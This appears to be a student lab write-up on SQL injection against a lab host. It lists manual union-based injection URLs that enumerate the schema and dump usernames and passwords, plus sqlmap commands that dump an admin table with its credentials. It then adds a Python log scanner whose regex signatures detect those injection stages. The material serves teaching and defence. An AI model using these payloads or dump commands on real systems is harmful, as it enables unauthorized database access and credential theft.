Lab objective
Give students an understanding of how SQL injection works and how it is exploited.
Lab content
- Lab target URL: http://10.110.2.145:8008/
- Obtain the password of the admin account through manual injection
- Take screenshots of the lab process; the screenshots must include both the payload and the result
Lab process screenshots
- Manual SQL injection
http://10.110.2.145:8008/article.php?id=1 and 1=1    # page content returned
http://10.110.2.145:8008/article.php?id=1 and 1=2    # no content returned
Use ORDER BY to determine the number of columns:
http://10.110.2.145:8008/article.php?id=1 order by 18    # page content returned
http://10.110.2.145:8008/article.php?id=1 order by 19    # no content returned
Get the current database:
http://10.110.2.145:8008/article.php?id=-1 union select 1,(database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
Get the tables of the current database:
http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
Get the columns of the yzsoumember table:
http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='yzsoumember'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
Get the contents of the username and password columns of the yzsoumember table:
http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(username,password) from jian.yzsoumember),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
- Injection with the sqlmap tool
Scan the site with sqlmap: sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1"
List the database names: sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1" --dbs
Found the dede database:
List the tables in the dede database:
sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1" -D dede --tables
Found the dede_admin table
Show all contents of the dede_admin table:
sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1" -D dede -T dede_admin --dump
Pwd=f297a57a5a743894a0e4
Account: admin, password: admin
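From the defending side, the manual probe sequence above (boolean test, ORDER BY column count, UNION SELECT, information_schema enumeration) leaves a recognisable trail in the web server's access log. The following Python script is an added example, not part of the lab report: it parses constructed combined-format log lines modelled on those probes, tags each decoded query parameter by the stage it matches, and reports source IPs that moved through more than one stage.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (combined log format) modelled on the
# probe sequence in the write-up: boolean test, ORDER BY count, UNION SELECT.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /article.php?id=1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /article.php?id=1%20and%201=2 HTTP/1.1" 200 310
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /article.php?id=1%20order%20by%2019 HTTP/1.1" 200 310
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /article.php?id=-1%20union%20select%201,(database()),3 HTTP/1.1" 200 4800
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /article.php?id=-1%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables),3 HTTP/1.1" 200 4900
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /article.php?id=2 HTTP/1.1" 200 5100
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)')

# One signature per stage of the union-based technique shown in the report.
SIGNATURES = [
    ("boolean-test", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("column-count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\.", re.I)),
]

def classify_value(value):
    """Return the names of all signatures matched by one decoded parameter value."""
    return [name for name, rx in SIGNATURES if rx.search(value)]

def scan_log(text):
    """Return (ip, param, tags) for every query parameter that matches a signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qsl percent-decodes the values, so keywords appear as the database saw them
        for param, value in parse_qsl(urlsplit(m["url"]).query, keep_blank_values=True):
            tags = classify_value(value)
            if tags:
                hits.append((m["ip"], param, tags))
    return hits

def probing_ips(text):
    """IPs seen in at least two distinct stages: a stronger signal than one odd request."""
    stages = {}
    for ip, _param, tags in scan_log(text):
        stages.setdefault(ip, set()).update(tags)
    return sorted(ip for ip, seen in stages.items() if len(seen) >= 2)
```

Because the match runs on the decoded parameter value rather than the raw URL, percent-encoded and plus-encoded variants of the same probe are tagged identically.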